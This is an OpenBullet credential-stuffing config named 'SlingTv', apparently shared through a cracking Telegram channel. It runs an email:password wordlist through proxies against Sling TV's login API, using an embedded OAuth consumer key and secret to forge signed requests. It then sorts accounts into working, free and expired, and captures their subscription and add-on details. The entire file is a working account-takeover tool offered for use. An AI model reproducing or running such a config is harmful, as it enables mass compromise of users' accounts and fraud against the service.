[SETTINGS]
{
  "Name": "SlingTv",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-04-04T08:30:47.0643828-04:00",
  "AdditionalInfo": "Telegram Channel: T.me/OpenBulletChannel | Need USA Proxy | Capture | CPM Rate: 100-1000",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#1 FUNCTION CurrentUnixTime -> VAR "1" 

#2 FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d" -> VAR "2" 

#3 FUNCTION HMAC SHA1 "BALomd2e4p4A7xKXjQxq94qwnER5FEMEQlwHxHp3&" HmacBase64=TRUE "PUT&https%3A%2F%2Fums.p.sling.com%2Fv3%2Fxauth%2Faccess_token.json&oauth_consumer_key%3DOwa77FUtwJZcKau11Vttf4FoU7qnc6HGRCYAUkKH%26oauth_nonce%3D<2>%26oauth_signature_method%3DHMAC-SHA1%26oauth_timestamp%3D<1>%26oauth_version%3D1.0" -> VAR "3" 

#4 FUNCTION URLEncode "<3>" -> VAR "4" 

REQUEST PUT "https://ums.p.sling.com/v3/xauth/access_token.json" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"device_guid\":\"44b98374-df5b-5f61-850a-fbb11266df1d\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Partner-Name: GOOGLE" 
  HEADER "Authorization: OAuth oauth_consumer_key=\"Owa77FUtwJZcKau11Vttf4FoU7qnc6HGRCYAUkKH\", oauth_nonce=\"<2>\", oauth_signature=\"<4>\", oauth_signature_method=\"HMAC-SHA1\", oauth_timestamp=\"<1>\", oauth_version=\"1.0\"" 
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-G973N Build/PPR1.190810.011)" 
  HEADER "Host: ums.p.sling.com" 
  HEADER "Connection: close" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalidEmailOrPassword" 
  KEYCHAIN Success OR 
    KEY "oauth_token" 

#tk1 PARSE "<SOURCE>" JSON "oauth_token" -> VAR "tk1" 

#tk2 PARSE "<SOURCE>" JSON "oauth_token_secret" -> VAR "tk2" 

#12 FUNCTION CurrentUnixTime -> VAR "12" 

#13 FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d" -> VAR "13" 

#14 FUNCTION HMAC SHA1 "BALomd2e4p4A7xKXjQxq94qwnER5FEMEQlwHxHp3&<tk2>" HmacBase64=TRUE "GET&https%3A%2F%2Fums.p.sling.com%2Fv2%2Fuser.json&oauth_consumer_key%3DOwa77FUtwJZcKau11Vttf4FoU7qnc6HGRCYAUkKH%26oauth_nonce%3D<13>%26oauth_signature_method%3DHMAC-SHA1%26oauth_timestamp%3D<12>%26oauth_token%3D<tk1>%26oauth_version%3D1.0" -> VAR "14" 

#15 FUNCTION URLEncode "<14>" -> VAR "15" 

REQUEST GET "https://ums.p.sling.com/v2/user.json" 
  
  HEADER "User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-G973N Build/PPR1.190810.011)" 
  HEADER "Partner-Name: GOOGLE" 
  HEADER "Authorization: OAuth oauth_consumer_key=\"Owa77FUtwJZcKau11Vttf4FoU7qnc6HGRCYAUkKH\", oauth_nonce=\"<13>\", oauth_signature=\"<15>\", oauth_signature_method=\"HMAC-SHA1\", oauth_timestamp=\"<12>\", oauth_token=\"<tk1>\", oauth_version=\"1.0\"" 

#Subscription PARSE "<SOURCE>" LR "subscriptionpacks\":[{\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "Subscription" 

#Status PARSE "<SOURCE>" LR "account_status\":\"" "\"" CreateEmpty=FALSE -> CAP "Status" 

#ADDONS PARSE "<SOURCE>" JSON "name" Recursive=TRUE CreateEmpty=FALSE -> CAP "ADDONS" 

KEYCHECK 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Status>" Contains "expired" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Status>" Contains "inactive" 
    KEY "subscriptionpacks\":[],\"" 
  KEYCHAIN Success OR 
    KEY "<Status>" Contains "active" 

